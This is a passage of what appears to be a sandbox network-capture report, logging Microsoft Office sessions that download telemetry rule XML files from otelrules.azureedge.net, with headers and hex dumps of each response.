                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                        ETag: "0x8DC582BE1223606"
                                                                        x-ms-request-id: c3f555e4-101e-0028-3c1d-418f64000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165107Z-174f7845968xlwnmhC1EWR0sv800000015xg00000000ud8v
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:08 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        115192.168.2.44987513.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:09 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:10 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:09 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1360
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                        ETag: "0x8DC582BDDEB5124"
                                                                        x-ms-request-id: 5a810e9b-b01e-003d-75b4-42d32c000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165109Z-174f7845968pght8hC1EWRyvxg00000009ag00000000gdx3
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:10 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        116192.168.2.44987713.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:09 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:10 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:10 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1366
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                        ETag: "0x8DC582BDB779FC3"
                                                                        x-ms-request-id: 2467a365-a01e-00ab-65f1-439106000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165110Z-174f7845968frfdmhC1EWRxxbw00000016ag000000004rgq
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:10 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        117192.168.2.44987413.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:09 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:10 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:10 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1397
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                        ETag: "0x8DC582BE7262739"
                                                                        x-ms-request-id: f24b5158-501e-0047-6a59-43ce6c000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165110Z-174f7845968vqt9xhC1EWRgten000000165g00000000r4gk
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:10 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        118192.168.2.44987813.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:09 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:10 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:10 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1397
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                        ETag: "0x8DC582BDFD43C07"
                                                                        x-ms-request-id: 709a1193-501e-00a3-3559-43c0f2000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165110Z-174f7845968nxc96hC1EWRspw800000015vg00000000sduc
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:10 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        119192.168.2.44987613.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:09 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:10 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:10 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1403
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                        ETag: "0x8DC582BDCB4853F"
                                                                        x-ms-request-id: 5c1224a4-501e-0029-53ee-44d0b8000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165110Z-174f7845968qj8jrhC1EWRh41s000000167g000000004psc
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:10 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        120192.168.2.44987913.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:11 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:12 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:12 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1360
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                        ETag: "0x8DC582BDD74D2EC"
                                                                        x-ms-request-id: a0e0d5c5-a01e-0084-68de-419ccd000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165112Z-174f7845968px8v7hC1EWR08ng00000016ag00000000y5yn
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:12 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        121192.168.2.44988013.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:11 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:12 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:12 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1427
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                        ETag: "0x8DC582BE56F6873"
                                                                        x-ms-request-id: ab6eb442-501e-0035-0e91-3fc923000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165112Z-174f7845968kvnqxhC1EWRmf3g0000000swg00000000vat5
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:12 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        122192.168.2.44988113.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:12 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:12 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:12 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1390
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                        ETag: "0x8DC582BE3002601"
                                                                        x-ms-request-id: e52eaca9-401e-0064-32a1-4254af000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165112Z-174f78459684bddphC1EWRbht400000015vg00000000rf4u
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:12 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        123192.168.2.44988213.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:12 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:12 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:12 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1401
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                        ETag: "0x8DC582BE2A9D541"
                                                                        x-ms-request-id: e78111bd-301e-0020-4cf9-446299000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165112Z-174f7845968cs2nkhC1EWR2tq000000001ug00000000nz5k
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:12 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        124192.168.2.44988313.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:12 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:12 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:12 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1364
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                        ETag: "0x8DC582BEB6AD293"
                                                                        x-ms-request-id: 20c5b054-901e-0016-7725-44efe9000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165112Z-174f7845968vqt9xhC1EWRgten000000164000000000vs8e
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:12 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        125192.168.2.44988513.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:14 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
